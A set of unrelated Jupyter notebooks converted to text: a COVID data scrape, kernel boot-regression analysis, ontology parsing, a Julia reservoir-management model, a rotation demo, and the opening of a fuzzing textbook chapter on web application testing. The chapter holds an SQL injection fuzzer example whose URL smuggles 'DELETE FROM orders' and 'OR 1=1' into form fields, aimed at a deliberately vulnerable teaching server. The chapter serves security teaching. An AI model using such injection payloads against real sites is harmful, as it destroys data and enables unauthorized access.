calc_combinations(adapters))
2020/Day 10.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3.6.9 64-bit # name: python36964bitf5b195da2cdf45ecac6606a5567484dd # --- import pandas as pd pd.options.display.max_columns = 50 df_html = pd.read_html('https://docs.google.com/spreadsheets/d/e/2PACX-1vQU0SIALScXx8VXDX7yKNKWWPKE1YjFlWc6VTEVSN45CklWWf-uWmprQIyLtoPDA18tX9cFDr-aQ9S6/pubhtml#') # pd.read_html return as list of dataframes df2 = df_html[0] df2.drop([0, 1, 2],inplace= True) df2.reset_index(inplace = True) #Resetting index col = ['reporting_date', 'summary', 'location', 'country', 'gender', 'age', 'symptom_onset', 'If_onset_approximated', 'hosp_visit_date', 'international_traveler', 'domestic_traveler', 'exposure_start', 'exposure_end', 'traveler', 'visiting_Wuhan', 'from_Wuhan', 'death', 'recovered', 'symptom', 'source','link'] df2.drop(columns=['index', 'Unnamed: 0', 'Unnamed: 1', 'Unnamed: 2', 'Unnamed: 4', 'Unnamed: 25', 'Unnamed: 26', 'Unnamed: 27', 'Unnamed: 28', 'Unnamed: 29', 'Unnamed: 30'], inplace= True) df2.columns = col df2.to_csv('covid-19_03|11|20.csv', index= False) df = pd.read_csv('covid-19_03|11|20.csv') df.head() df.shape (df.isnull().sum()/len(df))*100 def unique(df): for col in df.columns: print(col + ':' , len(df[col].value_counts())) unique(df) def new_death_col(col): if (col[16] != '0' and col[16] != '1'): return col[16] else: return '0' df['death_date'] = df2.apply(new_death_col,axis = 1) df[df['death'] != '0'] df['death_date'].value_counts()
data_exploration.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # + #Objective: If something was passing in mainline.. but failing in 'next', want to catch those commits causing regressions. #Note: Not dealing with situations where we don't have data for last 2 days. # - import pandas as pd import json from pandas.io.json import json_normalize import matplotlib.pyplot as plt import datetime # %matplotlib inline #Input Parameters job1 = 'mainline' job2 = 'next' date_range = 10 threshold = 0.01 last_days=2 # + import requests from urlparse import urljoin import kernelci_api_key BACKEND_URL = "http://api.kernelci.org" def invoke(job_name, date_range_loc): headers = {"Authorization":kernelci_api_key.getkernelcikey()} params = { "job": job_name, "date_range": date_range_loc } url = urljoin(BACKEND_URL, "/boot") response = requests.get(url, params=params, headers=headers) return response.content def getDfBoots(job_name, date_range_loc): content = invoke(job_name, date_range_loc) contentjs = json.loads(content) df = json_normalize(contentjs['result']) #Select only columns we care about for boot pass/fail analysis df2 = df[['_id.$oid',u'arch',u'board',u'board_instance', u'created_on.$date',u'defconfig',u'dtb', u'git_describe',u'lab_name',u'mach',u'status']] #convert created_on to datetime and use as index df2['created_on'] = pd.to_datetime(df2['created_on.$date'],unit='ms') df2 = df2.set_index('created_on') df2 = df2.drop('created_on.$date',axis=1) #Consider only Pass and Fail df2 = df2[df2.status.isin(['PASS','FAIL'])] df2['status_fl'] = df2.status.map({'PASS':1,'FAIL':0}) #Sort index of dates df2 = df2.sort_index() del df #Find Boot pass percentage and number of boots for all days df3 = df2.groupby(['defconfig','board']).mean() df3.columns = [job_name+'_st_L'] df3[job_name+'_c_L'] = df2.groupby(['defconfig','board']).count().status_fl #Find Boot pass percentage and number of boots for last 'last_days' days df4 = df2[(df2.index[-1] - datetime.timedelta(last_days)):df2.index[-1]].groupby(['defconfig','board']).mean() df4.columns = [job_name+'_st_S'] df4[job_name+'_c_S'] = df2[(df2.index[-1] - datetime.timedelta(last_days)):df2.index[-1]].groupby(['defconfig','board']).count().status_fl return (df2,df3.join(df4,how='inner')) # + #Plot two overlapping defconfig-board with interaction from bokeh.plotting import figure, output_file, output_notebook,show, GridPlot from bokeh.models import ColumnDataSource, Circle, HoverTool,CustomJS def retSimpleLists(df, defconfig, board, name): df2 = df[(df.defconfig == defconfig) & (df.board == board)] (x,y,k) = (df2.index.to_series(), df2['status_fl'],df2['git_describe']) ts = pd.to_datetime(x.values) z = ts.strftime('%Y.%m.%d') n = [] for i in range(0,len(x)): n.append(name) return (x,y,k,z,n) def retInteractiveFig(x,y,k,z,color,title): p = figure(width=600,height=300,x_axis_type='datetime', title=title) p.line(x,y,line_dash="4 4", line_width=2,color=color) source = ColumnDataSource({'x':x,'y':y,'z':z,'k':k}) invisible_circle = Circle(x='x',y='y', fill_color=color, fill_alpha=0.1, line_color=None, size=10) visible_circle = Circle(x='x',y='y', fill_color='firebrick', fill_alpha=0.5, line_color=None, size=10) cr = p.add_glyph(source, invisible_circle, selection_glyph=visible_circle, nonselection_glyph=invisible_circle) #Add hover tool, that selects the circle # Add a hover tool, that selects the circle code = "source.set('selected', cb_data['index']);" callback = CustomJS(args={'source': source}, code=code) p.add_tools(HoverTool( tooltips=[ ("d", "@z"), ("stat", "@y"), ('gd', "@k") ], callback=callback, renderers=[cr], mode='vline')) return p def draw_interactive_2(df1, df2, defconfig, board): #Reduce data to given defconfig-board combo x1,y1,k1,z1,n1 = retSimpleLists(df1, defconfig, board,'mainline') x2,y2,k2,z2,n2 = retSimpleLists(df2, defconfig, board,'next') output_notebook() #draw line,circles for df1 (Eg: mainline) p1 = retInteractiveFig(x1,y1,k1,z1,'blue','mainline') p2 = retInteractiveFig(x2,y2,k2,z2,'red','next') show(p1) show(p2) #gp = GridPlot(children=[p1,p2]) #show(gp) # - df_mainline,df_mainline_sum = getDfBoots('mainline', date_range) df_next,df_next_sum = getDfBoots('next', date_range) df = df_mainline_sum.join(df_next_sum, how='inner')[['mainline_st_S','next_st_S']] df[(df.mainline_st_S - df.next_st_S) > threshold] draw_interactive_2(df_mainline,df_next,'multi_v7_defconfig', 'qcom-msm8974-sony-xperia-honami') defconfig = 'multi_v7_defconfig' board = 'qcom-msm8974-sony-xperia-honami' x1,y1,k1,z1,n1 = retSimpleLists(df_mainline, defconfig, board, 'mainline') x2,y2,k2,z2,n2 = retSimpleLists(df_next, defconfig, board, 'next') # + #Plot above with interaction from bokeh.plotting import figure, output_file, output_notebook,show from bokeh.models import ColumnDataSource, Circle, Triangle, HoverTool,CustomJS,BoxSelectTool p = figure(width=600,height=300,x_axis_type='datetime', title='Vish') #p.line(x1,y1,line_dash="4 4", line_width=2,color='blue') p.line(x2,y2,line_dash="4 4", line_width=2,color='green') source1 = ColumnDataSource({'x1':x1,'y1':y1,'z1':z1,'k1':k1,'n1':n1}) source2 = ColumnDataSource({'x2':x1,'y2':y2,'z2':z2,'k2':k2,'n2':n2}) mainline_glyph = Circle(x='x1',y='y1', fill_color='blue',fill_alpha=0.3,line_color=None, size=10) next_glyph = Circle(x='x2',y='y2', fill_color='green',fill_alpha=0.3,line_color=None, size=10) mainline_a = p.add_glyph(source1, mainline_glyph) next_a = p.add_glyph(source2, next_glyph) code = "source.set('selected', cb_data['index']);" callback = CustomJS(args={'source1': source1}, code=code) mainline_ht = HoverTool( tooltips=[("n", "@n1"),("d", "@z1"),("stat", "@y1"),('gd', "@k1")], callback=callback, renderers=[mainline_a], mode='vline') code2 = "source.set('selected', cb_data['index']);" callback2 = CustomJS(args={'source': source2}, code=code2) next_ht = HoverTool( tooltips=[("n", "@n2"),("d", "@z2"),("stat", "@y2"),('gd', "@k2")], callback=callback2, renderers=[next_a], mode='vline') p.add_tools(mainline_ht, next_ht) show(p) # -
tinker/Catch_Culprit_Commits_Heading_to_Mainline.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: obo-owl # language: python # name: obo-owl # --- # + import time import rdflib class NciThesaurusTools(object): """A class to provide a toolkit for working with OWL files from NCI Thesaurus.""" @staticmethod def _parse_owl(inputfile: str) -> rdflib.Graph: """ Summary: -------- A semantically related method to the class, to be used as a reproducible means to parse an OWL to XML. Parameters: ----------- inputfile : str. inputfile NCI Thesaurus OWL file that is to be parsed. Returns: -------- graph : rdflib.Graph. A live RDF graph instance of the NCI Thesaurus's release. """ try: start_time = time.time() graph = rdflib.Graph() print("Begin to parse OWL inputfile...") # Need to bind prefix --> if not will result in blank prefix graph.namespace_manager.bind( "ncit", "http://ncicb.nci.nih.gov/xml/owl/EVS/Thesaurus.owl#" ) graph.parse(inputfile, format="xml") # format='xml' is default end_time = time.time() print( "Successfully completed parsing OWL in: {} ".format( end_time - start_time ) ) except Exception as e: raise Exception(e) return graph # - # Parse OWL file (NCI Thesaurus latest release -> Thesaurus.owl) to RDF/XML parser = NciThesaurusTools() g = parser._parse_owl(inputfile="./input_data/Thesaurus.owl") len(g) # + # # %%time # # Output a turtle serialization of the live RDF graph instance to same directory as input OWL # # This can take ~10 minutes # g.serialize( # destination="./output_data/ncit_serialized.ttl", # format="ttl", # encoding='utf-8' # ) # + # # %%time # # Serialization to JSON-LD is supported & can be done as follows: # g.serialize(destination='./output_data/ncit_serialized_jsonld.jsonld', # format='json-ld', # indent=2) # + from pprint import pprint import pandas as pd pd.set_option("display.max_rows", 999) pd.set_option("display.max_colwidth", None) # + # Namespaces & Prefixes df = pd.DataFrame( data=g.namespace_manager.namespaces(), columns=["prefix", "namespace"] ).sort_values(by=["prefix"]) df # for namespace in g.namespaces(): # print(namespace) # + from pprint import pprint test_sparql = """SELECT DISTINCT ?s ?p ?o WHERE { ?s rdf:type owl:Class . ?s ?p ?o . } LIMIT 20""" result = g.query(test_sparql) for x in result: pprint(x) df = pd.DataFrame(data=x, columns=["s", "p", "o"]).drop_duplicates() df # + # Build a function to print x amount of triples (limit(x) = 5) def printtriples(graph, limit): n = 0 for trip in graph: pprint(trip) print("\r") n = n + 1 if n >= limit: break return trip printtriples(graph=g, limit=5) # + def printtriples(graph, limit): n = 0 for subj, pred, obj in graph: pprint(subj) pprint(pred) pprint(obj) print("\n\n") if limit > 0: n = n + 1 if n == limit: break return subj, pred, obj printtriples(graph=g, limit=3) # + # SPARQL query to collect all predicates within graph predicates = """SELECT DISTINCT ?p WHERE { ?s rdf:type owl:Class . ?s ?p ?o . } LIMIT 100""" # Run the query predicates, and save the results in variable result result = g.query(predicates) # Print all results for row in result: # pprint(row[0]) df = pd.DataFrame(data=result, columns=["p"]).drop_duplicates() df.sort_values("p") # + # Find p & o where conceptUri = 'C62554' -> Parp Inhibitor conceptUri = "ncit:C62554" parp = f"""SELECT DISTINCT ?p ?o WHERE {{ {conceptUri} rdf:type owl:Class . {conceptUri} ?p ?o . }} LIMIT 150""" # Run the query q1, and save the results in variable r1 result = g.query(parp) # Print the results for x in result: # print(x[0], "\n") df = pd.DataFrame(data=result, columns=["p", "o"]).drop_duplicates() df.head(20) # -
parse_ncit_owl.ipynb
# -*- coding: utf-8 -*- # --- # jupyter: # jupytext: # text_representation: # extension: .jl # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Julia 0.6.0 # language: julia # name: julia-0.6 # --- # # 9.7.4 Water Management # # From <NAME> Fackler, Applied Computational Economics and Finance, 2002, Section 9.7.4 # 貯水池の水を灌漑用水とレクリエーションに使うことができる。年初に $s$ 単位の水が貯水池にあって、灌漑に $x$ 単位使われたとき、農家とレクリエーション使用者のその年の利益はそれぞれ $F(x)$ と $U(s-x)$ になる。貯水池の水は冬季にランダムに $\epsilon$ 単位降る雨によって補充される。貯水池は最大 $M$ 単位の水しか貯められない。 # このモデルは an infinite horizon ,stochastic model である。 # # The state variable: $s \in [0, M]$ …年初の貯水池の水量。 # # The action variable: $x \in [0, s]$ …灌漑に使われる水量。 # # The state transition function: $g(s, x, \epsilon) = min(s - x + \epsilon, M)$ # # The reward function: $f(s, x) = F(x) + U(s - x)$ # # 年初に $s$ 単位の水がある貯水池の社会的価値がベルマン方程式を満たす。 # # $V(s) = \max_{0 \leq x \leq s}\{F(x) + U(s - x) + \delta E_\epsilon V (min(s - x + \epsilon, M)\}$ # $F'(0), U'(0), M$ が十分に大きいと仮定すると、最適解において制約が束縛されないので、水の潜在価格 $\lambda(s)$ はオイラーの平衡条件を満たす。 # # $F'(x) - U'(s - x) - \delta E_\epsilon \lambda (s - x + \epsilon) = 0$ # # $\lambda(s) = U'(s - x) + \delta E_\epsilon \lambda (s - x + \epsilon)$ # # このことは最適経路の周辺で $F'_t = U'_t + \delta E_t \lambda_{t + 1}$ が成立することを示す。 # 確実性等価での安定状態での貯水池の水量 $s^*$ 、灌漑に用いる水量 $x^*$ 、潜在価格 $\lambda^*$ で方程式を解くと、 # # $x^* = \bar{\epsilon}$ # # $F'(x^*) = \lambda^*$ # # $U'(s^* - x^*) = (1 - \delta)F'(x^*)$ # # ここで $\bar{\epsilon}$ は年間の平均降水量である。この条件は $x^*$ と $\lambda^*$ は割引因子の影響を受けず、 $s^*$ は割引因子の影響を受けることを示す。 using QuantEcon using BasisMatrices using Optim using Plots struct WaterManagement a1::Float64 a2::Float64 b1::Float64 b2::Float64 sigma::Float64 delta::Float64 s_vec::Vector{Float64} end n = 10 smin = 2 smax = 7 fspace = Basis(ChebParams(n, smin, smax)) snodes = nodes(fspace) WM =WaterManagement(1, 2, -2, -3, 0.2, 0.9, snodes[1]) # ### 一次線形補間 a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta nshocks = 3 epsilon, weight = qnwlogn(nshocks, - WM.sigma^2/2, WM.sigma^2) # + function update_Bellman1(WM::WaterManagement, V::Vector) a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta V_new = similar(V) x_opt = similar(V) V_func = LinInterp(WM.s_vec, V) for (s_idx, s) in enumerate(WM.s_vec) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,V_func.(s-x+epsilon))) opt = optimize(objective, 1e-10, s) V_new[s_idx] = - opt.minimum x_opt[s_idx] = opt.minimizer end return V_new, x_opt end # - # Initial guess V = zeros(length(WM.s_vec)); # + V_computed = similar(V) x_opt = similar(V) resid1 = Vector{Float64}(n) tol = sqrt(eps()) max_iter = 500 V_error = 1.0 i = 1 while V_error > tol && i <= max_iter V_computed, x_opt = update_Bellman1(WM, V) V_error = maximum(abs, V_computed - V) for j in 1:length(V_computed) resid1[j] = V_computed[j] - V[j] end copy!(V, V_computed) i += 1 end # - plot(WM.s_vec, x_opt, xlabel="Water Level", ylabel="Irrigation", xlim=(2, 7), ylim=(0.6, 1.6)) # ### Chebychev Collocation n = 10 s_min = 2 s_max = 7 basis = Basis(ChebParams(n, s_min, s_max)) S, _ = nodes(basis) Phi = BasisMatrix(basis, Expanded(), S).vals[1] # + function update_Bellman2(WM::WaterManagement, C::Vector) a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta V_new = similar(C) x_opt = similar(C) for (s_idx, s) in enumerate(S) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight, funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) V_new[s_idx] = - opt.minimum x_opt[s_idx] = opt.minimizer end C_new = Phi \ V_new return C_new, x_opt end # - C = zeros(n); # + C_computed = similar(C) x_opt = similar(C) tol = sqrt(eps()) max_iter = 500 C_error = 1.0 i = 1 while C_error > tol && i <= max_iter C_computed, x_opt = update_Bellman2(WM, C) C_error = maximum(abs, C_computed - C) copy!(C, C_computed) i += 1 end # - i, C_error, x_opt ss = linspace(s_min, s_max, 50) x_opt = Array{Float64}(length(ss)) for (s_idx, s) in enumerate(ss) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) x_opt[s_idx] = opt.minimizer end B1 = evalbase(basis.params[1], ss, 1) cheb_shadow_prices = B1 * C; # ### Linear Quadratic approximation function approx_lq(s_star, x_star, f_star, Df_star, DDf_star, g_star, Dg_star, discount) n = 2 # Dim of state variable (1, s) k = 1 # Dim of control variable x sx_star = [s_star, x_star] # (1, s)' R (1, s) + 2 x N (1, s) + x Q x Q = Array{Float64}(k, k) R = Array{Float64}(n, n) N = Array{Float64}(k, n) R[1, 1] = -(f_star - Df_star' * sx_star + (sx_star' * DDf_star * sx_star) / 2) R[2, 2], N[1, 2], N[1, 2], Q[1, 1] = -DDf_star / 2 R[2, 1], N[1, 1] = -(Df_star - DDf_star * sx_star) / 2 R[1, 2] = R[2, 1] # A (1, s) + B x + C w A = Array{Float64}(n, n) B = Array{Float64}(n, k) C = zeros(n, 1) A[1, 1], A[1, 2], B[1, 1] = 1, 0, 0 A[2, 1] = g_star - Dg_star' * sx_star A[2, 2], B[2, 1] = Dg_star lq = LQ(Q, R, A, B, C, N, bet=discount) return lq end estar = exp(-sigma^2/2) # + f(s, x) = a1 * x^(1+b1)/(1 + b1) + a2 * (s - x)^(1 + b2)/(1 + b2) f_s(s, x) = a2 * (s - x)^b2 f_x(s, x) = a1 * x^b1 - a2 * (s - x)^b2 f_ss(s, x) = a2 * b2 * (s - x)^(b2 - 1) f_sx(s, x) = -a2 * b2 * (s - x)^(b2 - 1) f_xx(s, x) = a1 * b1 * x^(b1 - 1) + a2 * b2 * (s - x)^(b2 - 1) g(s, x) = s - x + estar g_s(s, x) = 1 g_x(s, x) = -1; # - x_star = 1 s_star = 1 + (a1 * (1 - delta)/a2)^(1/b2) s_star, x_star f_x(s_star, x_star) + delta * f_s(g(s_star, x_star), x_star) * g_x(s_star, x_star) f_star = f(s_star, x_star) Df_star = [f_s(s_star, x_star), f_x(s_star, x_star)] DDf_star = [f_ss(s_star, x_star) f_sx(s_star, x_star); f_sx(s_star, x_star) f_xx(s_star, x_star)] g_star = g(s_star, x_star) Dg_star = [g_s(s_star, x_star), g_x(s_star, x_star)]; lq = approx_lq(s_star, x_star, f_star, Df_star, DDf_star, g_star, Dg_star, delta) P, F, d = stationary_values(lq) V_LQ(s) = [1, s]' * P * [1, s] + d V_LQ(s_star) -f_star / (1 - lq.bet) X_LQ(s) = - (F * [1, s])[1] X_LQ(s_star) x_star s_min, s_max = 2, 7 ys = [x_opt, X_LQ.(ss)] title = "Optimal Irrigation Policy" xlabel = "Water Level" ylabel = "Irrigation" labels = ["Chebychev" "L-Q"] plot(ss, ys, xlims=(s_min, s_max), ylims=(0.6, 1.6), title=title, xlabel=xlabel, ylabel=ylabel, label = labels) plot!([s_star], [x_star], m=(7,:star8), label="") lq_shadow_price(s) = -2 * (P * [1, s])[2] ys = [cheb_shadow_prices, lq_shadow_price.(ss)] title = "Shadow Price Function" ylabel = "Price" labels = ["Chebychev" "L-Q"] plot(ss, ys, xlims=(s_min, s_max), ylims=(-0.5, 2.5), title=title, xlabel=xlabel, ylabel=ylabel, label=labels) plot!([s_star], [lq_shadow_price(s_star)], m=(7,:star8), label="") V_new = Array{Float64}(length(ss)) for (s_idx, s) in enumerate(ss) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) V_new[s_idx] = -opt.minimum end Resid = V_new - funeval(C, basis, ss); plot(ss, Resid, yformatter=:scientific)
src/Water_Management.jl.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Rotasjon med komplekse tal # %pylab # %matplotlib inline # e^i\alpha som rotasjon: x = array([0,4,4,5,4,2,2,1,1,0,-1,0,0,NaN,2,2,3,3,NaN,0.5,0.5,1.5,1.5,0.5, NaN,2.5,2.5,3.5,3.5,2.5]) y = array([0,0,6,5,7,7,8,8,7,7,5,6,0,NaN,0,2,2,0,NaN,3,4.5,4.5,3,3,NaN,3,4.5,4.5,3,3]) z = x+1j*y plot(z.real, z.imag) axis('equal') alfa = 2.2 # rotasjonsvinkel rotasjon = exp(1j*alfa) z1 = rotasjon*z plot(z1.real, z1.imag) axis('equal') def rotate(alfa=0): figure(figsize=(4,4)) rot = exp(1j*alfa) z1 = rot*z plot(z1.real, z1.imag) axis((-10,10,-10,10)) import ipywidgets as widgets widgets.interact(rotate, alfa=(0.,2*pi,.1))
Rotasjon.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "slide"} # # Testing Web Applications # # In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # **Prerequisites** # # * The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb). # * Basic knowledge of HTML and HTTP is required. # * Knowledge of SQL databases is helpful. # + [markdown] slideshow={"slide_type": "slide"} # ## Synopsis # <!-- Automatically generated. Do not edit. --> # # To [use the code provided in this chapter](Importing.ipynb), write # # ```python # >>> from fuzzingbook.WebFuzzer import <identifier> # ``` # # and then make use of the following features. # # # This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it. # # ### Fuzzing Web Forms # # `WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements. # # Here's the grammar extracted for our vulnerable Web server: # # ```python # >>> web_form_fuzzer = WebFormFuzzer(httpd_url) # >>> web_form_fuzzer.grammar['<start>'] # ['<action>?<query>'] # >>> web_form_fuzzer.grammar['<action>'] # ['/order'] # >>> web_form_fuzzer.grammar['<query>'] # ['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>'] # ``` # Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form. # # ```python # >>> web_form_fuzzer.fuzz() # '/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit=' # ``` # Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values. # # ### SQL Injection Attacks # # `SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`: # # ```python # >>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders") # >>> sql_fuzzer.fuzz() # "/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=" # ``` # As you can see, the path to be retrieved contains the payload encoded into one of the form field values. # # `SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it. # # # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} toc-hr-collapsed=false # ## A Web User Interface # # Let us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles. In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library. # + [markdown] slideshow={"slide_type": "fragment"} # All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests. # + slideshow={"slide_type": "skip"} from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(BaseHTTPRequestHandler): pass # + [markdown] slideshow={"slide_type": "subslide"} # ### Taking Orders # # For our Web server, we need a number of Web pages: # * We want one page where customers can place an order. # * We want one page where they see their order confirmed. # * Additionally, we need pages display error messages such as "Page Not Found". # + [markdown] slideshow={"slide_type": "fragment"} # We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions: # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} import bookutils # + slideshow={"slide_type": "subslide"} FUZZINGBOOK_SWAG = { "tshirt": "One FuzzingBook T-Shirt", "drill": "One FuzzingBook Rotary Hammer", "lockset": "One FuzzingBook Lock Set" } # + [markdown] slideshow={"slide_type": "fragment"} # This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_ORDER_FORM = """ <html><body> <form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong> <p> Yes! Please send me at your earliest convenience <select name="item"> """ # (We don't use h2, h3, etc. here as they interfere with the notebook table of contents) for item in FUZZINGBOOK_SWAG: HTML_ORDER_FORM += \ '<option value="{item}">{name}</option>\n'.format(item=item, name=FUZZINGBOOK_SWAG[item]) HTML_ORDER_FORM += """ </select> <br> <table> <tr><td> <label for="name">Name: </label><input type="text" name="name"> </td><td> <label for="email">Email: </label><input type="email" name="email"><br> </td></tr> <tr><td> <label for="city">City: </label><input type="text" name="city"> </td><td> <label for="zip">ZIP Code: </label><input type="number" name="zip"> </tr></tr> </table> <input type="checkbox" name="terms"><label for="terms">I have read the <a href="/terms">terms and conditions</a></label>.<br> <input type="submit" name="submit" value="Place order"> </p> </form> </body></html> """ # + [markdown] slideshow={"slide_type": "subslide"} # This is what the order form looks like: # + slideshow={"slide_type": "skip"} from IPython.display import display # + slideshow={"slide_type": "skip"} from bookutils import HTML # + slideshow={"slide_type": "fragment"} HTML(HTML_ORDER_FORM) # + [markdown] slideshow={"slide_type": "fragment"} # This form is not yet functional, as there is no server behind it; pressing "place order" will lead you to a nonexistent page. # + [markdown] slideshow={"slide_type": "subslide"} toc-hr-collapsed=false # ### Order Confirmation # # Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. Here is the HTML and the rendering: # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_ORDER_RECEIVED = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong> <p id="confirmation"> We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br> A confirmation mail will be sent to {email}. </p> <p> Want more swag? Use our <a href="/">order form</a>! </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer", name="<NAME>", email="<EMAIL>", city="Seattle", zip="98104")) # + [markdown] slideshow={"slide_type": "subslide"} # ### Terms and Conditions # # A Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_TERMS_AND_CONDITIONS = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong> <p> The content of this project is licensed under the <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.</a> </p> <p> To place an order, use our <a href="/">order form</a>. </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_TERMS_AND_CONDITIONS) # + [markdown] slideshow={"slide_type": "slide"} # ## Storing Orders # + [markdown] slideshow={"slide_type": "fragment"} # To store orders, we make use of a *database*, stored in the file `orders.db`. # + slideshow={"slide_type": "skip"} import sqlite3 import os # + slideshow={"slide_type": "fragment"} ORDERS_DB = "orders.db" # + [markdown] slideshow={"slide_type": "fragment"} # To interact with the database, we use *SQL commands*. The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form. # + slideshow={"slide_type": "subslide"} def init_db(): if os.path.exists(ORDERS_DB): os.remove(ORDERS_DB) db_connection = sqlite3.connect(ORDERS_DB) db_connection.execute("DROP TABLE IF EXISTS orders") db_connection.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)") db_connection.commit() return db_connection # + slideshow={"slide_type": "fragment"} db = init_db() # + [markdown] slideshow={"slide_type": "fragment"} # At this point, the database is still empty: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # We can add entries using the SQL `INSERT` command: # + slideshow={"slide_type": "fragment"} db.execute("INSERT INTO orders " + "VALUES ('lockset', '<NAME>', '<EMAIL>', 'Albuquerque', '87101')") db.commit() # + [markdown] slideshow={"slide_type": "fragment"} # These values are now in the database: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # We can also delete entries from the table again (say, after completion of the order): # + slideshow={"slide_type": "fragment"} db.execute("DELETE FROM orders WHERE name = '<NAME>'") db.commit() # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # ### Handling HTTP Requests # # We have an order form and a database; now we need a Web server which brings it all together. The Python `http.server` module provides everything we need to build a simple HTTP server. A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages. # + [markdown] slideshow={"slide_type": "fragment"} # We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message. # + slideshow={"slide_type": "subslide"} class 